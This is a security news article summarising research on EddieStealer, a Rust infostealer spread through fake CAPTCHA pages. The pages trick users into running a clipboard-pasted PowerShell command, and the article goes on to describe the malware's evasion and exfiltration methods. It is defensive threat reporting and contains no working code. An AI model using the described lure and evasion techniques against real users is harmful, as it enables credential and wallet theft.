EddieStealer Malware Exploits Fake CAPTCHAs to Steal Credentials

Elastic Security Labs has uncovered a new Rust-based infostealer named EddieStealer, which employs deceptive CAPTCHA pages to trick users into executing malicious scripts, leading to credential theft and data exfiltration.

EddieStealer Deceptive CAPTCHA Strategy

EddieStealer is disseminated through adversary-controlled web domains that present fake CAPTCHA interfaces mimicking legitimate verification systems. These fraudulent CAPTCHAs display prompts like “Verify you are a human” or “I’m not a robot,” seamlessly blending into compromised websites or phishing campaigns to deceive unsuspecting users.

Infection Mechanism

The initial infection vector involves compromised websites hosting an obfuscated React-based JavaScript payload. This payload presents a counterfeit “I’m not a robot” page. When users interact with this interface, a malicious PowerShell command is copied to their clipboard using the document.execCommand("copy") method. Users are then instructed to open the Windows run dialog, paste the command, and execute it. This action silently downloads a second-stage payload, gverify.js, from attacker infrastructure.

The gverify.js script, another obfuscated JavaScript file, fetches and saves the main EddieStealer executable from the attacker domain, storing it in the user’s Downloads folder with a pseudorandom name. The malware is then executed in a hidden window using cscript, avoiding visible signs of activity to the infected user.

Advanced Evasion Techniques

Written in Rust, EddieStealer leverages the language’s features for enhanced stealth and resilience against traditional analysis workflows. Critical strings within the malware are encrypted using a simple XOR cipher, with each decryption requiring a dedicated key derivation function and inline decryption at runtime. Additionally, the malware employs several obfuscation and anti-analysis techniques, including stripped symbols and the use of tools like rustbinsign for Rust signature generation, complicating static analysis.

EddieStealer also incorporates sandbox evasion strategies. It checks for at least 4.0 GB of available system memory and will self-delete if this threshold is not met. The self-deletion process uses NTFS Alternate Data Streams renaming to bypass file locks, a technique observed in other malware families.

EddieStealer Data Exfiltration Capabilities

Upon execution, EddieStealer decrypts configuration data and communicates with its command-and-control (C2) server via HTTP. The configuration, received in AES CBC-encrypted and Base64-encoded format, contains a session ID, a list of exfiltration tasks, communication keys, and a self-delete flag.

EddieStealer targets a wide range of sensitive data, including credentials, browser data, cryptocurrency wallet information, and details from password managers, messaging applications, and FTP clients. The specific targets and files are defined by the remote C2 server and can be adjusted by operators.

Implications and Recommendations

EddieStealer’s emergence shows the evolving tactics of cybercriminals, particularly their use of deceptive interfaces and advanced programming languages like Rust to enhance malware stealth and effectiveness. Users should exercise caution when encountering CAPTCHA prompts, especially those that require unusual actions like copying and executing commands.

Organizations must implement robust security measures, including up-to-date antivirus solutions, employee training on phishing tactics, and monitoring for unusual system behaviors, to mitigate the risks posed by such sophisticated threats.